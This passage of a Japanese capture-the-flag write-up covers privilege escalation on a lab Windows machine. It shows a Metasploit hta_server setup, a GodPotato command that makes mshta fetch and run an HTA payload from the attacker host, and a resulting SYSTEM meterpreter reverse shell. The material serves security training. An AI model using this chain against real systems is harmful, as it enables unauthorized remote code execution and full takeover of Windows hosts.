%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
Metasploit Documentation: https://docs.metasploit.com/
semsf6 > search windows/misc/hta_server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/hta_server 2016-10-06 manual No HTA Web Server
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hta_server
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Powershell x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LPORT 1234
LPORT => 1234
msf6 exploit(windows/misc/hta_server) > set SRVPORT 8082
SRVPORT => 8082
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.68:1234
[*] Using URL: http://10.10.14.68:8082/4EcVLJy.hta
msf6 exploit(windows/misc/hta_server) >
さっきの権限を持っているシェルでGodpottatoを起動します。
C:\xampp\htdocs\uploads>GodPotato-NET4.exe -cmd "mshta.exe http://10.10.14.68:8082/4EcVLJy.hta"
GodPotato-NET4.exe -cmd "mshta.exe http://10.10.14.68:8082/4EcVLJy.hta"
[*] CombaseModule: 0x140731624849408
[*] DispatchTable: 0x140731627155568
[*] UseProtseqFunction: 0x140731626531744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\ee78db9b-751c-4d3b-a7d8-818ac4263826\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000802-112c-ffff-aebb-d0f19a47a266
[*] DCOM obj OXID: 0x77f1c22c75d16e8e
[*] DCOM obj OID: 0xa3991dac85cf3ef4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 860 Token:0x764 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4432
C:\xampp\htdocs\uploads>
[*] Server started.
[*] 10.10.11.234 hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:1234 -> 10.10.11.234:51679) at 2023-10-14 07:56:02 -0400
msf6 exploit(windows/misc/hta_server) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ VISUAL 10.10.14.68:1234 -> 10.10.11.234:51679 (10.10.11.234)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > guid
[+] Session GUID: 93c0b1bb-ff6d-4879-8b7b-70af0627e3c0
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
システム権限を奪取しました!これでRootフラグゲットデス!
まとめ
これで特権昇格に成功し、Root権限奪取に成功しました。
UserフラグのゲットはWindowsで攻略しました。このPayloadが刺さるまで苦労しました。Windowsでの攻略環境の整備も必要そうですねー。
Userフラグ後は一般的な攻略だったのではないでしょうか?
今回もセキュリティエンジニアの皆さんの助けになればなと思います。